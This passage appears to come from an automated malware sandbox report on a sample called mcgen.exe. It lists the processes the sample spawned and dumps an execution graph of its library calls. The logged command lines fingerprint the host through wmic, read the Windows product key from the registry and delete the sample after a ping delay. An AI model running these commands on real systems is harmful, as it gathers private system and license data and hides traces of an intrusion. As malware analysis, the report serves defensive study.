                                                                                                                                                                                                                                                                  Commandline:wmic os get Caption
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7b5c80000
                                                                                                                                                                                                                                                                  File size:576'000 bytes
                                                                                                                                                                                                                                                                  MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:107
                                                                                                                                                                                                                                                                  Start time:03:22:32
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff6729b0000
                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:108
                                                                                                                                                                                                                                                                  Start time:03:22:32
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:109
                                                                                                                                                                                                                                                                  Start time:03:22:32
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:wmic computersystem get totalphysicalmemory
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7b5c80000
                                                                                                                                                                                                                                                                  File size:576'000 bytes
                                                                                                                                                                                                                                                                  MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:110
                                                                                                                                                                                                                                                                  Start time:03:22:33
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff6729b0000
                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:111
                                                                                                                                                                                                                                                                  Start time:03:22:33
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:112
                                                                                                                                                                                                                                                                  Start time:03:22:33
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:wmic csproduct get uuid
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7b5c80000
                                                                                                                                                                                                                                                                  File size:576'000 bytes
                                                                                                                                                                                                                                                                  MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:114
                                                                                                                                                                                                                                                                  Start time:03:22:34
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff6729b0000
                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:115
                                                                                                                                                                                                                                                                  Start time:03:22:34
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:116
                                                                                                                                                                                                                                                                  Start time:03:22:35
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                                                                                                                                                                                                  Imagebase:0x7ff6e3d50000
                                                                                                                                                                                                                                                                  File size:452'608 bytes
                                                                                                                                                                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:117
                                                                                                                                                                                                                                                                  Start time:03:22:35
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff6729b0000
                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:118
                                                                                                                                                                                                                                                                  Start time:03:22:35
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:119
                                                                                                                                                                                                                                                                  Start time:03:22:35
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:wmic path win32_VideoController get name
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7b5c80000
                                                                                                                                                                                                                                                                  File size:576'000 bytes
                                                                                                                                                                                                                                                                  MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:120
                                                                                                                                                                                                                                                                  Start time:03:22:37
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff6729b0000
                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:121
                                                                                                                                                                                                                                                                  Start time:03:22:37
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:122
                                                                                                                                                                                                                                                                  Start time:03:22:37
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                                                                                                                                                                                                                  Imagebase:0x7ff6e3d50000
                                                                                                                                                                                                                                                                  File size:452'608 bytes
                                                                                                                                                                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:123
                                                                                                                                                                                                                                                                  Start time:03:22:40
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\user\Desktop\mcgen.exe""
                                                                                                                                                                                                                                                                  Imagebase:0x7ff6729b0000
                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:124
                                                                                                                                                                                                                                                                  Start time:03:22:40
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Target ID:125
                                                                                                                                                                                                                                                                  Start time:03:22:41
                                                                                                                                                                                                                                                                  Start date:02/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\PING.EXE
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:ping localhost -n 3
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7d4f50000
                                                                                                                                                                                                                                                                  File size:22'528 bytes
                                                                                                                                                                                                                                                                  MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  Reset < >

                                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                                    Execution Coverage:9.5%
                                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                    Signature Coverage:17%
                                                                                                                                                                                                                                                                    Total number of Nodes:2000
                                                                                                                                                                                                                                                                    Total number of Limit Nodes:33
                                                                                                                                                                                                                                                                    execution_graph 15918 7ff6b9f30938 15919 7ff6b9f3095c 15918->15919 15922 7ff6b9f3096c 15918->15922 16069 7ff6b9f24f78 15919->16069 15921 7ff6b9f30c4c 15924 7ff6b9f24f78 _get_daylight 11 API calls 15921->15924 15922->15921 15923 7ff6b9f3098e 15922->15923 15925 7ff6b9f309af 15923->15925 16072 7ff6b9f30ff4 15923->16072 15926 7ff6b9f30c51 15924->15926 15929 7ff6b9f30a21 15925->15929 15931 7ff6b9f309d5 15925->15931 15936 7ff6b9f30a15 15925->15936 15928 7ff6b9f2a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15926->15928 15940 7ff6b9f30961 15928->15940 15933 7ff6b9f2ec08 _get_daylight 11 API calls 15929->15933 15950 7ff6b9f309e4 15929->15950 15930 7ff6b9f30ace 15939 7ff6b9f30aeb 15930->15939 15947 7ff6b9f30b3d 15930->15947 16087 7ff6b9f29730 15931->16087 15937 7ff6b9f30a37 15933->15937 15936->15930 15936->15950 16099 7ff6b9f3719c 15936->16099 15941 7ff6b9f2a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15937->15941 15944 7ff6b9f2a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15939->15944 15945 7ff6b9f30a45 15941->15945 15942 7ff6b9f309fd 15942->15936 15949 7ff6b9f30ff4 45 API calls 15942->15949 15943 7ff6b9f309df 15946 7ff6b9f24f78 _get_daylight 11 API calls 15943->15946 15948 7ff6b9f30af4 15944->15948 15945->15936 15945->15950 15953 7ff6b9f2ec08 _get_daylight 11 API calls 15945->15953 15946->15950 15947->15950 15951 7ff6b9f3344c 40 API calls 15947->15951 15959 7ff6b9f30af9 15948->15959 16135 7ff6b9f3344c 15948->16135 15949->15936 16093 7ff6b9f2a9b8 15950->16093 15952 7ff6b9f30b7a 15951->15952 15954 7ff6b9f2a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15952->15954 15956 7ff6b9f30a67 15953->15956 15958 7ff6b9f30b84 15954->15958 15957 7ff6b9f2a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15956->15957 15957->15936 15958->15950 15958->15959 15960 7ff6b9f30c40 15959->15960 16049 7ff6b9f2ec08 15959->16049 15962 7ff6b9f2a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15960->15962 15961 7ff6b9f30b25 15963 7ff6b9f2a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15961->15963 15962->15940 15963->15959 15966 7ff6b9f30bd9 16056 7ff6b9f2a514 15966->16056 15967 7ff6b9f30bd0 15969 7ff6b9f2a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15967->15969 15990 7ff6b9f30bd7 15969->15990 15971 7ff6b9f30c7b 16065 7ff6b9f2a970 IsProcessorFeaturePresent 15971->16065 15972 7ff6b9f30bf0 16144 7ff6b9f372b4 15972->16144 15975 7ff6b9f2a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15975->15940 15978 7ff6b9f30c38 15984 7ff6b9f2a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15978->15984 15979 7ff6b9f30c17 15982 7ff6b9f24f78 _get_daylight 11 API calls 15979->15982 15985 7ff6b9f30c1c 15982->15985 15984->15960 15987 7ff6b9f2a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15985->15987 15987->15990 15990->15975 16055 7ff6b9f2ec19 _get_daylight 16049->16055 16050 7ff6b9f2ec6a 16052 7ff6b9f24f78 _get_daylight 10 API calls 16050->16052 16051 7ff6b9f2ec4e HeapAlloc 16053 7ff6b9f2ec68 16051->16053 16051->16055 16052->16053 16053->15966 16053->15967 16055->16050 16055->16051 16163 7ff6b9f33600 16055->16163 16057 7ff6b9f2a52b 16056->16057 16058 7ff6b9f2a521 16056->16058 16059 7ff6b9f24f78 _get_daylight 11 API calls 16057->16059 16058->16057 16063 7ff6b9f2a546 16058->16063 16060 7ff6b9f2a532 16059->16060 16172 7ff6b9f2a950 16060->16172 16061 7ff6b9f2a53e 16061->15971 16061->15972 16063->16061 16064 7ff6b9f24f78 _get_daylight 11 API calls 16063->16064 16064->16060 16066 7ff6b9f2a983 16065->16066 16234 7ff6b9f2a684 16066->16234 16256 7ff6b9f2b338 GetLastError 16069->16256 16071 7ff6b9f24f81 16071->15940 16073 7ff6b9f31029 16072->16073 16080 7ff6b9f31011 16072->16080 16074 7ff6b9f2ec08 _get_daylight 11 API calls 16073->16074 16083 7ff6b9f3104d 16074->16083 16075 7ff6b9f310d2 16273 7ff6b9f2a574 16075->16273 16076 7ff6b9f310ae 16078 7ff6b9f2a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16076->16078 16078->16080 16080->15925 16081 7ff6b9f2ec08 _get_daylight 11 API calls 16081->16083 16082 7ff6b9f2a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16082->16083 16083->16075 16083->16076 16083->16081 16083->16082 16084 7ff6b9f2a514 __std_exception_copy 37 API calls 16083->16084 16085 7ff6b9f310bd 16083->16085 16084->16083 16086 7ff6b9f2a970 _isindst 17 API calls 16085->16086 16086->16075 16088 7ff6b9f29749 16087->16088 16089 7ff6b9f29740 16087->16089 16088->15942 16088->15943 16089->16088 16339 7ff6b9f29208 16089->16339 16094 7ff6b9f2a9bd RtlFreeHeap 16093->16094 16095 7ff6b9f2a9ec 16093->16095 16094->16095 16096 7ff6b9f2a9d8 GetLastError 16094->16096 16095->15940 16097 7ff6b9f2a9e5 Concurrency::details::SchedulerProxy::DeleteThis 16096->16097 16098 7ff6b9f24f78 _get_daylight 9 API calls 16097->16098 16098->16095 16100 7ff6b9f371a9 16099->16100 16101 7ff6b9f362c4 16099->16101 16103 7ff6b9f24fbc 45 API calls 16100->16103 16102 7ff6b9f362d1 16101->16102 16109 7ff6b9f36307 16101->16109 16104 7ff6b9f24f78 _get_daylight 11 API calls 16102->16104 16121 7ff6b9f36278 16102->16121 16106 7ff6b9f371dd 16103->16106 16107 7ff6b9f362db 16104->16107 16105 7ff6b9f36331 16108 7ff6b9f24f78 _get_daylight 11 API calls 16105->16108 16110 7ff6b9f371f3 16106->16110 16114 7ff6b9f3720a 16106->16114 16134 7ff6b9f371e2 16106->16134 16111 7ff6b9f2a950 _invalid_parameter_noinfo 37 API calls 16107->16111 16112 7ff6b9f36336 16108->16112 16109->16105 16113 7ff6b9f36356 16109->16113 16115 7ff6b9f24f78 _get_daylight 11 API calls 16110->16115 16116 7ff6b9f362e6 16111->16116 16117 7ff6b9f2a950 _invalid_parameter_noinfo 37 API calls 16112->16117 16122 7ff6b9f24fbc 45 API calls 16113->16122 16123 7ff6b9f36341 16113->16123 16119 7ff6b9f37226 16114->16119 16120 7ff6b9f37214 16114->16120 16118 7ff6b9f371f8 16115->16118 16116->15936 16117->16123 16124 7ff6b9f2a950 _invalid_parameter_noinfo 37 API calls 16118->16124 16126 7ff6b9f37237 16119->16126 16127 7ff6b9f3724e 16119->16127 16125 7ff6b9f24f78 _get_daylight 11 API calls 16120->16125 16121->15936 16122->16123 16123->15936 16124->16134 16129 7ff6b9f37219 16125->16129 16632 7ff6b9f36314 16126->16632 16641 7ff6b9f38fbc 16127->16641 16132 7ff6b9f2a950 _invalid_parameter_noinfo 37 API calls 16129->16132 16132->16134 16133 7ff6b9f24f78 _get_daylight 11 API calls 16133->16134 16134->15936 16136 7ff6b9f3348b 16135->16136 16137 7ff6b9f3346e 16135->16137 16139 7ff6b9f33495 16136->16139 16681 7ff6b9f37ca8 16136->16681 16137->16136 16138 7ff6b9f3347c 16137->16138 16141 7ff6b9f24f78 _get_daylight 11 API calls 16138->16141 16688 7ff6b9f37ce4 16139->16688 16143 7ff6b9f33481 __scrt_get_show_window_mode 16141->16143 16143->15961 16145 7ff6b9f24fbc 45 API calls 16144->16145 16146 7ff6b9f3731a 16145->16146 16147 7ff6b9f37328 16146->16147 16700 7ff6b9f2ef94 16146->16700 16703 7ff6b9f2551c 16147->16703 16151 7ff6b9f37414 16153 7ff6b9f37425 16151->16153 16155 7ff6b9f2a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16151->16155 16152 7ff6b9f24fbc 45 API calls 16154 7ff6b9f37397 16152->16154 16156 7ff6b9f30c13 16153->16156 16158 7ff6b9f2a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16153->16158 16157 7ff6b9f2ef94 5 API calls 16154->16157 16159 7ff6b9f373a0 16154->16159 16155->16153 16156->15978 16156->15979 16157->16159 16158->16156 16160 7ff6b9f2551c 14 API calls 16159->16160 16161 7ff6b9f373fb 16160->16161 16161->16151 16162 7ff6b9f37403 SetEnvironmentVariableW 16161->16162 16162->16151 16166 7ff6b9f33640 16163->16166 16171 7ff6b9f30348 EnterCriticalSection 16166->16171 16175 7ff6b9f2a7e8 16172->16175 16174 7ff6b9f2a969 16174->16061 16176 7ff6b9f2a813 16175->16176 16179 7ff6b9f2a884 16176->16179 16178 7ff6b9f2a83a 16178->16174 16189 7ff6b9f2a5cc 16179->16189 16184 7ff6b9f2a8bf 16184->16178 16185 7ff6b9f2a970 _isindst 17 API calls 16186 7ff6b9f2a94f 16185->16186 16187 7ff6b9f2a7e8 _invalid_parameter_noinfo 37 API calls 16186->16187 16188 7ff6b9f2a969 16187->16188 16188->16178 16190 7ff6b9f2a5e8 GetLastError 16189->16190 16191 7ff6b9f2a623 16189->16191 16192 7ff6b9f2a5f8 16190->16192 16191->16184 16195 7ff6b9f2a638 16191->16195 16198 7ff6b9f2b400 16192->16198 16196 7ff6b9f2a66c 16195->16196 16197 7ff6b9f2a654 GetLastError SetLastError 16195->16197 16196->16184 16196->16185 16197->16196 16199 7ff6b9f2b43a FlsSetValue 16198->16199 16200 7ff6b9f2b41f FlsGetValue 16198->16200 16202 7ff6b9f2b447 16199->16202 16203 7ff6b9f2a613 SetLastError 16199->16203 16201 7ff6b9f2b434 16200->16201 16200->16203 16201->16199 16204 7ff6b9f2ec08 _get_daylight 11 API calls 16202->16204 16203->16191 16205 7ff6b9f2b456 16204->16205 16206 7ff6b9f2b474 FlsSetValue 16205->16206 16207 7ff6b9f2b464 FlsSetValue 16205->16207 16208 7ff6b9f2b480 FlsSetValue 16206->16208 16209 7ff6b9f2b492 16206->16209 16210 7ff6b9f2b46d 16207->16210 16208->16210 16215 7ff6b9f2af64 16209->16215 16211 7ff6b9f2a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16210->16211 16211->16203 16220 7ff6b9f2ae3c 16215->16220 16232 7ff6b9f30348 EnterCriticalSection 16220->16232 16235 7ff6b9f2a6be _isindst __scrt_get_show_window_mode 16234->16235 16236 7ff6b9f2a6e6 RtlCaptureContext RtlLookupFunctionEntry 16235->16236 16237 7ff6b9f2a756 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16236->16237 16238 7ff6b9f2a720 RtlVirtualUnwind 16236->16238 16239 7ff6b9f2a7a8 _isindst 16237->16239 16238->16237 16242 7ff6b9f1c5c0 16239->16242 16243 7ff6b9f1c5c9 16242->16243 16244 7ff6b9f1c950 IsProcessorFeaturePresent 16243->16244 16245 7ff6b9f1c5d4 GetCurrentProcess TerminateProcess 16243->16245 16246 7ff6b9f1c968 16244->16246 16251 7ff6b9f1cb48 RtlCaptureContext 16246->16251 16252 7ff6b9f1cb62 RtlLookupFunctionEntry 16251->16252 16253 7ff6b9f1cb78 RtlVirtualUnwind 16252->16253 16254 7ff6b9f1c97b 16252->16254 16253->16252 16253->16254 16255 7ff6b9f1c910 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 16254->16255 16257 7ff6b9f2b379 FlsSetValue 16256->16257 16262 7ff6b9f2b35c 16256->16262 16258 7ff6b9f2b369 16257->16258 16259 7ff6b9f2b38b 16257->16259 16260 7ff6b9f2b3e5 SetLastError 16258->16260 16261 7ff6b9f2ec08 _get_daylight 5 API calls 16259->16261 16260->16071 16263 7ff6b9f2b39a 16261->16263 16262->16257 16262->16258 16264 7ff6b9f2b3b8 FlsSetValue 16263->16264 16265 7ff6b9f2b3a8 FlsSetValue 16263->16265 16267 7ff6b9f2b3d6 16264->16267 16268 7ff6b9f2b3c4 FlsSetValue 16264->16268 16266 7ff6b9f2b3b1 16265->16266 16270 7ff6b9f2a9b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 16266->16270 16269 7ff6b9f2af64 _get_daylight 5 API calls 16267->16269 16268->16266 16271 7ff6b9f2b3de 16269->16271 16270->16258 16272 7ff6b9f2a9b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 16271->16272 16272->16260 16282 7ff6b9f336c0 16273->16282 16308 7ff6b9f33678 16282->16308 16313 7ff6b9f30348 EnterCriticalSection 16308->16313 16340 7ff6b9f29221 16339->16340 16353 7ff6b9f2921d 16339->16353 16362 7ff6b9f32660 16340->16362 16345 7ff6b9f2923f 16388 7ff6b9f292ec 16345->16388 16346 7ff6b9f29233 16347 7ff6b9f2a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16346->16347 16347->16353 16350 7ff6b9f2a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16351 7ff6b9f29266 16350->16351 16352 7ff6b9f2a9b8 